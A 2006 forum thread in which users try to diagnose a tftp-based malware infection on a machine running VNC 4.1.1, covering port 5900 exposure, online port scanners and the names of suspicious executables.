Post by: mauserme on October 01, 2006, 07:58:35 PM
Quote from: cylosine
My understanding is the first line downloads the dirty file to IP address 0.0.0.0 where I am not sure of the importance of 0.0.0.0, I had expected your Public IP address here, could be a very good thing.
I believe 0.0.0.0 designates "default route" in this case.  This way an outbound connection can be established without knowing the address for the gateway and may hide the underlying process to some degree.


Quote from: cylosine
Like you I have still no idea how our machine got activated.  Because we used vnc 4.1.1 I am assuming that somehow an accidental portscan revealed our existence on the net despite running in stealth mode behind a software firewall.

Certainly port 5900 is open during an active session but keep in mind that the GRC site doesn't scan that high (it only goes as high as port 1055 for the Scan All Service Ports test and includes port 5000 (but nothing higher) for the Common Ports test).  If you want to test this further you could try the scanning tools at PC Flank, which has an option to specify a port under the Advanced Port Scanner tab:

http://www.pcflank.com/scanner1s.htm

or a program like Nmap (use cautiously lest you get booted by your ISP).

From this point of view it could be a random scan but maybe more likely an attacker targeting the vulnerability.

Quote from: cylosine
1.. The command windows may disappear, if they are coming from the outside.
2.. If you have any trace of malware still around, try PREVX1, I have still not found any other mention on the net. But

I'm guessing #1 will be the case if your server is being cracked during an active session, but you might still need to remove malware (so far I haven't seen any indication that it's originating on the client).

#2 is a definite if the problem originates on the server in the form of something like a trojan downloader.

The answer to which of these is the case may be in when the problems occur - only during an active session or randomly when the server is idling.  Does anyone have information on this?
Title: Re: DOS (tftp) virus
Post by: cylosine on October 02, 2006, 06:55:38 AM
Hi mauserme,

About 0.0.0.0 I was hoping this was not the case, wonder what happened.

GRC test, thanks for pointing out the scan is limited to 'service' group.  I forgot that higher up one must be more specific, the largest range scan is 64 ports at a time. A scan of 5900-5963 only revealed that 5900 is known as vnc entry.

General: I have just done a search on the internet for the following files, and listed which virus labs seem to have some info:

msinexecs.exe    prevx
msqrsm.exe       prevx
winlolx.exe      prevx, Sophos?
louvz.exe        nothing mentioned

Has anybody else seen better information on these?